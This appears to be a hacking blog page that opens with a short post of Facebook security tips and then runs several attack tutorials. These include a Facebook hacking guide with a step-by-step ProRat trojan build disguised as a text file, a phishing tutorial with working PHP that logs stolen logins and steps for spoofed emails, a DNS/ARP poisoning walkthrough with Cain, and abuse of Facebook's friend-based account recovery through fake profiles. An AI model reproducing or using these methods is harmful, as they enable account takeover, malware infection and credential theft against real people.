8 Top Facebook Security Tips

FACEBOOK TIPS

World wide web is now expending, Internet has successfully turn the whole world into a village and for doing this social networks played and playing an important role, in the era of social networks there is a facebook,  Facebook has a large number of user's and it is on hit list of attacker's and scam-er.
While you are using facebook or any social networking website there is a need to protect your information by using effective privacy techniques.
This article will talk about some security issues and their countermeasure on facebook or it can be applicable on other social networking websites.

 Strong Passwords

You must care about your passwords, make sure you have a strong password that contain capital letters,small letters,numbers and special characters. Use different password for different online accounts, your password must not related to some of your information, do not use such a words that are easily available on dictionary. To learn more about dictionary attack click here.

Secure Browsing
It is good practice to keep yourself up to date means make sure that you are using update OS and browser to avoid browser exploitation attack, use secure connection (HTTPS) where possible to avoid sniffing.

Computer Security 
It is very important to stay secure on web, make sure your computer does not contain any sort of keyloggers, RAT (remote administration tool) and istealer or some other things like this. Use a smart antivirus and firewall solution to remain secure, if you think that your computer got affected by some malware and than follow the procedure to fight with.

Personal Information
Avoid to put so much information about yourself on facebook profile, a hacker might be use these information to hack your password by using reverse engineering technique, or an attacker might create a dictionary by using your information to launch a password based attack.

Profile Privacy Setting
It is recommended to make your profile as a privacy master profile, hide your information from those people to whom you never trust and from those people who are new to you, disable each and everything from those who have not added into your profile as a friend, because there is chance that someone watching your activities.


Application Setting
Each facebook application has a default setting and when you allow any application to use, it means that you have signed an agreement and the developer of this application may watch all of your activities and can get your password, can update your status and more, so avoid applications as much as possible. To learn more about application spamming click here.

 Account Security
It is good practice to add different email address for your single profile and must connect your mobile phone with your profile, in case if you lost your account than you have an ability to prove as a owner of this account, lean more security to protect your account.

More Tips

    You must not share your password to any one.
    Disable your browser from saving your password.
    Avoid to sign in your account when you are in public place.
    If you are using wireless LAN(WLAN) than must think about firesheep.

Read more »

FACEBOOK HACKING COMPLETE GUIDE

Hello Guys Its me back with the latest post related to “Facebook Hacking”.

Before moving on I would give you a special NOTICE In my Blog I have posted everything I have written and If that post was not written by me than I would write the source from where I have copied you can check it too.

So if you copy this post from my Blog http://www.devilscafe.co.cc/ than do write from where you have copied.

So now lets move on to the Topic.

Facebook Hacking I think most of you want to know how to hack Facebook password so in this post I have posted everything you should know to hack someone’s Facebook.

I will first introduce you with some Old style Hacking to Hardcore Hacking.

First one with the old and most the common method of getting someone’s password

i) Primary mail- You register your Facebook account from primary mail like yahoo, Gmail, etc. If you get access to someone’s primary mail than you can goto Forgot your password link get the confirmation code and access the account.

But How to get someone’s primary account’s password ?
Don’t worry about it you should do just what I have told you firstly go to yahoo.com(or other email provider) and press Forgot your password Link there you will be asked some questions like Where were you born or Where do you live By guessing this you can get the access to your friends account.

ii) Social Engineering- I think many of you know what social engineering is. If you don’t know do not worry I am gonna explain it.
Social Engineering is a process of manipulating someone by pretending that they are some one(like IT officer) and need your information to do some certain researches.
Here is an example of it :

Conversation between an Elite Hacker and a Newbie person(NooB)

Elite Hacker : Hi I got a good news for you
Newbie : What??
Elite Hacker : Do you want to learn hacking in few days.
Newbie now being excitedNewbie : Yeah Will you teach me ?
Elite Hacker : No I will post some of my Hacking Course video(top secret) in your account so give me your login details.
Newbie without thinking of anything gives his Facebook details.
This is pretty much how someone can hack your Facebook by pretending. I also used this process and hacked over 10+ account on my own.

iii) Friendship Attack- This is not a hacking process but I have included you to give full Guide. Ok friendship bomb is like Cheating your friend. You can install some programs in your friends PC and you can threaten him/her to give him/her password. Its kinna like Enemy attack.

iv) Garbage Dumping- There are many people who use long password and to remember they note that password in the paper and stick is somewhere usually behind the Keyboard. Sometimes they accidentally throw that paper in garbage. To check this some Professional Hacker (usually Crackers) search in the garbage of the person’s house. Its not like WHO WILL DO THIS KIND OF STUFF? but once you get the password or any sensible information than you make get an employment in Garbage Factory :P.

v) Hiring a Hacker- There is many hackers who crack someone’s password for you by paying. You can even find someone online.(BUT NOT ME PLZ) and tell them to do.
Now you have to be careful doing this cause there are many sites that tell you that they will crack password for you by paying but all they are doing is cheating on you so to confirm that they did hack the account then tell them to give a screenshot of it or tell what message you have send the user. This will make you safe if the hacker is fooling you.

vi) Spam Hack- Now this is more interesting. You may sometime have got spammed by some application in Facebook. Some application send message like Look how this girl killed herself after seeing this {link} now when you click on the link you will to be spammed some application spam by sending message in chat and some in Wall post.
Now we are taking this step to hack someone’s account. First create a application in Facebook which spam the user by telling [you] hacked my account praise him. Here you means your name like example If I have put Arpit there than It will say Arpit Hacked my account praise him. Now after looking this people or your friends will think that I have hacked him/her and people will gather around you. A neat way to cheat people ;).

vii) JavaScript- Now all of my favorite web programming language’s turn. If you think JavaScript is useless than you are Wrong. Its an very powerful language.
Now this trick doesn’t hack your friends password but make your friend look like they hacked. You can get a complex JavaScript which will display You got Owned Now by telling your friends to put that code in the browser’s address bar and Press Enter they will see a Box with you got owned It’s a good way to scare someone.

Now talking about some hardcore hacking \m/

i) Key logger- Very common and most used method for hacking someone’s Facebook account. You can download a key logger like Easy logger.

Download Easy logger by searching on Google. Now once you download Easy Logger See the image below.

Don’t put your Using Gmail account info in that cause if an hacker caught the keylogger than he can retrive your Password.

ii)Rats- Now this is a real hardcore. Now this article is not written by me. To save the time and delivery you fastly I have copied from The Underground Hackers Handbook

Begin-

To show you an example of a malicious program, I will use a well known Windows Trojan, ProRat.

1. Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be “pro”.

2. Open up the program. You should see the following:

3. Next we will create the actual Trojan file. Click on Create and choose Create ProRat Server.

4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.

5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document.

7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but exe’s looks suspicious so it would be smart to change it.

8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.

9. Finally click on Create Server to, you guessed it, create the server file.

10. A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

12. I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it.

15. Below is an image of my task bar after the hacker clicks on Hide Start Button.

16. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.

As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

iii) Phishing- Now you can get info about Phishing any where in Google Search in Google and Learn it.

SECURITY OWNED IS NOT THE AUTHOR OF THIS POST
THIS POST IS CREATE BY
http://www.devilscafe.in
AUTHOR:MINHAL MENDHI
THIS POST IS COPYRIGHT PROTECTED
BY DEVILSCAFE
FIND SME COOL TRICK FROMhttp://www.devilscafe.in

Read more »

How to Phish / Spoof FACEBOOK! (with pictures), Hack FB id

Now im gonna make a step by step tutorial for facebook accounts.

WITH PICTURES!!!



ONE!:

go to "www.facebook.com/login.php" and right click on some white space
on the page and press "view source code". ALOT of text is gonna appear,
copy it all to notepad.



TWO!:

Now we need to change a few things in the code. So that the login button
sends the info to our file instead of the facebook login. We do that by
editing the action of the code. So press Edit >> search. and
search "action=" without the quotes. you should find this





The big red ring that circles the "action=" you have to change. You have
to change it to 'action="next.php" '. after you have done that, you
should change the method (small red circle on the picture) to "get"
instead of "post", or else it will not work. Save the document as
"index.PHP" (not htm!)



THREE!:

Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this:

   
       
           
           
                <?php

header("Location: http://www.Facebook.com/login.php ");

$handle = fopen("passwords.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>
           
       
   
Save this as "next.php"



Note: for security you should rename "passwords.txt" to something else.

now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.



FOUR!:

Upload the 3 files "index.php", "next.php" and "passwords.txt" (or
whatever the password file is called) to a subdomain hosting site. THEY
MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com.
When you made an account you should upload the 3 files.



Congratz. You have yourself a working Phisher site!



FIVE!:

now we would like to send spoof emails out. To do that we should first
make an email account. which starts with facebook@. or something that
looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six.



SIX!:

Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET!

remove the hyperlink from this link:

http:/www.facebook.com/n/?reqs.php

Mark it and push the Add hyperlink button







Add hyperlink button in the red circle. now write your phisher page url
in the hyperlink bar that appears after clicking the button. and click
add. The hyperlink should still display
http:/www.facebook.com/n/?reqs.php

but lead to your phisher page.. Thats pretty kewl. Now i belive your
ready to send your spoof emails to everybody you know. and hopefully
some of them will fall for it.

Read more »

DNS poisoning using Cain

Hey guys Smile this Tutorial is about DNS poisoning on your network using Cain & Abel.

Download Cain here http://www.oxid.it/cain.html

This Tutorial Will be limited to just redirecting the traffic to another website.



Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)



First What is the DNS ? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for
computers, services, or any resource connected to the internet or a
private network. It associates various information with domain names
assigned to each of the participants. Most importantly, it translates
domain names meaningful to humans into the numerical (binary)
identifiers associated with networking equipment for the purpose of
locating and addressing these devices worldwide. An often used analogy
to explain the Domain Name System is that it serves as the "phone book"
for the Internet by translating human-friendly computer hostnames into
IP addresses. For example, http://www.example.com translates to 208.77.188.166.



What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.



First This is the structure of the network :




1 , 2 and 3 are computers



1 is the computer being the gateway (could be a router) (172.128.254.1)



2 is the target computer (172.128.254.10)



3 is the attacker using cain



Note : IPs are just used for this tutorial and chosen randomly.



Our work is on computer number 3.

__________________________________________________  ______



1-After you install cain , open it and go to the sniffer tab



2-Click on configure and choose your adapter



3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)



4-Right click in the empty area and choose scan MAC addresses. We get the results above.



5-Click on the APR Tab



6-Click on the + sign in the toolbar to add a new ARP poison routing



7-choose the gateway which is 172.128.254.1 , in the next list you’ll
get the IP of the computer 2 which is 172.128.254.10 and click ok



8-now click on the APR-DNS tab





9-click on the + sign



10-enter the web address that you want to spoof , (in this case when the
user goes to facebook he’ll be redirected to myspace) click on resolve
type the web address that you want to redirect the user to it, and click
ok, and you’ll get the IP of the web address, then click ok



you'll get something like this:



11-now to make this work we have to enable APR poisoning , click on the
icon next to the sniffer icon, and everything should work as we expect.



Now the computer 2 will get the routes poisoned and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com .

Imagine what you can do with this technique.



I hope this was a good tutorial for you guys , and please leave your feedback.
       

-----------------------

Read more »

Hack Facebook Accounts Easier

In this tutorial no skill is required, we'll just use the password recovery process with 3 fake profiles.(The fake profiles should be at least three weeks old).For
this you need to make 3 fake profiles on Facebook, and the victim that
you want to hack should be added to the friend's list of your victim.(Mutual friends would be nice.lol)



First, go to the password recovery process, which is accessible through Forgot your password? on the Facebook login page.



This image has been resized. Click this bar to view the full image. The original image is sized 800x498.



Then you need to identify your victim's account by using his Facebook
E-mail, Facebook name or Facebook name + Facebook friend's name. It
would be easier to identify the victim with his or her facebook name.
When you got the account, just  click on This Is My account.




This image has been resized. Click this bar to view the full image. The original image is sized 800x489.



Once you could identify you're victimss profile, Facebook suggests you
to recover the password by the existing email address. You can bypass
that by clicking on No longer have access to these?



This image has been resized. Click this bar to view the full image. The original image is sized 800x483.



Then Facebook will ask a secret question(If the victim has one), to
bypass that, you'll need to type the wrong answer three times. After
that Facebook will try to help you recover the password by the support
of 3 friends.



Just select your three fake profiles that your slave added to his
friends.(The friends must be registered more than three weeks).



This image has been resized. Click this bar to view the full image. The original image is sized 800x479.



Then you'll get the code on your fake profiles, with those 3 codes you can easily change the password.



NOTE: The account will be closed for 24 hours ans the old email and
the three friend who were given the codes receives a notification that
the password was changed.

-----------------------
Visit http://www.cyber-security.in

Read more »